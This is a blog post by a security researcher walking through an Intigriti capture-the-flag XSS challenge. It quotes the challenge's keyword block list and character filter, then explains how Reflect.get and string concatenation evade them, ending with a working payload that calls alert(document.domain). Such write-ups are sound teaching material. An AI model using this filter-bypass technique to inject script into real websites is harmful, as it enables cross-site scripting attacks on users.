Hello, readers! My name is Sekhar Poola, and I am a passionate security researcher and bug bounty hunter. With more than two years of experience in the field, I have dedicated myself to identifying vulnerabilities and contributing to the improvement of online security.
My journey into the world of cybersecurity began with a deep fascination for technology and a desire to protect others from potential threats. Over time, I honed my skills through continuous learning and hands-on experience, exploring various domains of cybersecurity such as web application security, network security, and penetration testing.
Throughout my career, I have actively participated in bug bounty programs, collaborating with organizations to identify and remediate security flaws in their systems. This hands-on experience has not only allowed me to enhance my technical expertise but has also provided valuable insights into real-world security challenges.
Challenge Link: https://challenge-0523.intigriti.io/ .
The main goal for the challenge is to execute document.domain in alert function.
By analyzing the source code , we noticed the following script
(()=>{
opener=null;
name='';
const xss = new URL(location).searchParams.get("xss") || '';
const characters = /^[a-zA-Z,'+\\.()]+$/;
const words =/alert|prompt|eval|setTimeout|setInterval|Function|location|open|document|script|url|HTML|Element|href|String|Object|Array|Number|atob|call|apply|replace|assign|on|write|import|navigator|navigation|fetch|Symbol|name|this|window|self|top|parent|globalThis|new|proto|construct|xss/i;
if(xss.length<100 && characters.test(xss) && !words.test(xss)){
script = document.createElement('script');
script.src='data:,'+xss
document.head.appendChild(script)
}
else{
console.log("try harder");
}
})()From the code, the points we need to observe:
- the xss parameter is taking from the xss parameter
- characters regex is declared — small and capital a-z, A-Z, (),,. are allowed. Numbers are not allowed
- words are Blacklisted for xss parameter
- the input xss data is feeding in script src with after “data:,” and script will render inside head tag
- If the above conditions failed, it shows “try harder” in console.
How the code is working in simply format:
The xss data is reflected in the following code.<script src="data:,<XSS-INPUT-DATA>"></script>
Based on above script code, most of the common functions keywords are blacklisted. Now we need to discovered new functions to execute alert.
Basic Concepts:
Reflect.get():Usage:
Reflect.get(target, propertyKey)target
The target object on which to get the property.propertyKey
The name of the property to get.The frames is called as window object.
Explaination:
- Reflect.get(frames,’ale’+’rt’):
- The Reflect.get() function is invoked with two arguments: frames and the property key ‘ale’+’rt’.
- Here alert is blacklisted, so we use string concatenation.
- Reflect.get(frames,’ale’+’rt’) retrieves the value of the property ‘alert’ from the frames object. In this case, it is likely accessing the window.alert function.
2. (Reflect.get(frames,’docu’+’ment’).domain):
- We used same Reflect.get() function.
- document is also blacklisted, so we string concentation.
- Reflect.get(frames,’docu’+’ment’) retrieves the value of the property ‘document’ from the frames object, which represents the document object of a specified frame.
- .domain is then accessed on the retrieved document object to get the value of its domain property. The domain property typically represents the domain name of the document’s URL.
3. By adding two payloads,
- The first part, Reflect.get(frames,’ale’+’rt’), retrieves the window.alert function.
- The second part, (Reflect.get(frames,’docu’+’ment’).domain), retrieves the domain property value of a specific frame’s document object.
- Finally, the retrieved window.alert function is invoked with the value of the domain property as an argument, resulting in the execution of alert(document.domain) for the specified frame.
Solution:Reflect.get(frames,'ale'+'rt')(Reflect.get(frames,'docu'+'ment').domain)
